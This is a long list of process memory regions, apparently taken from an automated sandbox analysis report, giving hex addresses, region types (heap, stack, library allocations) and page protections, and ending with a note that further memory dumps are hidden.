page read and write
1FB12ED7000
heap
page read and write
1FB1525F000
heap
page read and write
26F6D22A000
heap
page read and write
26F6D1EC000
heap
page read and write
7FF8491B0000
trusted library allocation
page read and write
1FB13CE4000
heap
page read and write
1FB12CEE000
heap
page read and write
1FB13986000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
1FB139A4000
heap
page read and write
1FB13A2E000
heap
page read and write
1FB10DCB000
heap
page read and write
1FB12DAE000
heap
page read and write
861B2FE000
stack
page read and write
1FB13D97000
heap
page read and write
1AA4B690000
trusted library allocation
page read and write
1FB139F9000
heap
page read and write
1AA495B0000
heap
page read and write
220FA739000
heap
page read and write
1FB1657D000
heap
page read and write
7FF848DF4000
trusted library allocation
page read and write
1FB1654F000
heap
page read and write
1FB1396C000
heap
page read and write
1FB139B2000
heap
page read and write
1FB15C24000
heap
page read and write
1FB1407D000
heap
page read and write
227C6430000
heap
page read and write
DB34F1E000
stack
page read and write
220FA931000
heap
page read and write
26F6D2A2000
heap
page read and write
1FB139DA000
heap
page read and write
1FB13E26000
heap
page read and write
220FA6A0000
heap
page read and write
1FB13E33000
heap
page read and write
1FB139BB000
heap
page read and write
26F6D7ED000
heap
page read and write
DB364CC000
stack
page read and write
1FB1661A000
heap
page read and write
861ADBE000
stack
page read and write
1FB12DBF000
heap
page read and write
1FB131FC000
heap
page read and write
1FB16656000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
1FB12DDD000
heap
page read and write
1FB139F9000
heap
page read and write
1FB12CC0000
heap
page read and write
1FB12B37000
heap
page read and write
1FB13EBB000
heap
page read and write
1FB139FC000
heap
page read and write
1FB13A19000
heap
page read and write
1FB1331E000
heap
page read and write
220F86FD000
heap
page read and write
1FB12DAD000
heap
page read and write
1FB139F9000
heap
page read and write
1FB1318A000
heap
page read and write
220FA9E7000
heap
page read and write
1FB13C88000
heap
page read and write
1FB12E2F000
heap
page read and write
1AA4B080000
trusted library allocation
page read and write
26F6D2B3000
heap
page read and write
1FB10DC1000
heap
page read and write
1FB139A0000
heap
page read and write
7FF635374000
unkown
page readonly
1FB139FC000
heap
page read and write
1FB12CB0000
heap
page read and write
1FB15A0F000
heap
page read and write
1FB169E4000
heap
page read and write
1FB139FC000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
1FB1341B000
heap
page read and write
7FF849260000
trusted library allocation
page read and write
1FB12B70000
heap
page read and write
1FB139B2000
heap
page read and write
C2590FE000
stack
page read and write
1FB13E2B000
heap
page read and write
1FB159D5000
heap
page read and write
7FF7C91C3000
unkown
page write copy
1FB139D4000
heap
page read and write
1FB1326F000
heap
page read and write
26F6D1E7000
heap
page read and write
220FA7C0000
heap
page read and write
220F8709000
heap
page read and write
1FB166F3000
heap
page read and write
1FB15315000
heap
page read and write
1FB1698F000
heap
page read and write
1FB13DF3000
heap
page read and write
1FB15A96000
heap
page read and write
1FB13A2D000
heap
page read and write
1AA63AFD000
heap
page read and write
1FB167D6000
heap
page read and write
220816B5000
trusted library allocation
page read and write
1FB15257000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
7FF6350D0000
unkown
page readonly
7FF6351DD000
unkown
page read and write
220902E7000
trusted library allocation
page read and write
DB3537F000
stack
page read and write
26F6F171000
heap
page read and write
1FB133F5000
heap
page read and write
26F6F17D000
heap
page read and write
1FB1399A000
heap
page read and write
1FB139D4000
heap
page read and write
26F6D2A2000
heap
page read and write
1FB1656D000
heap
page read and write
1FB133D7000
heap
page read and write
26F6F184000
heap
page read and write
1FB139C3000
heap
page read and write
1AA5B6E1000
trusted library allocation
page read and write
22080C4B000
trusted library allocation
page read and write
1FB139B2000
heap
page read and write
1FB1409E000
heap
page read and write
C1D90FE000
stack
page read and write
7FF8490C0000
trusted library allocation
page read and write
1FB139F9000
heap
page read and write
1FB10D8D000
heap
page read and write
1FB16564000
heap
page read and write
1FB10FD5000
heap
page read and write
1AA495A0000
heap
page read and write
1FB10DC8000
heap
page read and write
1FB12DF1000
heap
page read and write
26F6D26B000
heap
page read and write
220FAA74000
heap
page read and write
1FB1693A000
heap
page read and write
7FF849198000
trusted library allocation
page read and write
2714B811000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
7FF849146000
trusted library allocation
page read and write
1FB139FC000
heap
page read and write
861AD33000
stack
page read and write
26F6D7FF000
heap
page read and write
1FB10DCE000
heap
page read and write
1FB12D11000
heap
page read and write
1FB13BF2000
heap
page read and write
1FB167E4000
heap
page read and write
1AA4C31D000
trusted library allocation
page read and write
1FB12DEA000
heap
page read and write
1FB1682B000
heap
page read and write
1FB12DFD000
heap
page read and write
1FB159DD000
heap
page read and write
1FB16880000
heap
page read and write
1FB16576000
heap
page read and write
1FB12D10000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
1FB12CB1000
heap
page read and write
7FF6351DD000
unkown
page write copy
26F6D197000
heap
page read and write
220FA990000
heap
page read and write
1AA63B42000
heap
page read and write
1FB12D36000
heap
page read and write
1FB15265000
heap
page read and write
1FB143AB000
heap
page read and write
1FB139A4000
heap
page read and write
1FB139C3000
heap
page read and write
1FB13311000
heap
page read and write
1FB16633000
heap
page read and write
1FB139E2000
heap
page read and write
1AA4D249000
trusted library allocation
page read and write
1FB12DED000
heap
page read and write
1FB12C8A000
heap
page read and write
1FB13988000
heap
page read and write
1FB13A4D000
heap
page read and write
1FB152C3000
heap
page read and write
1FB1337E000
heap
page read and write
There are 1701 hidden memdumps, click here to show them.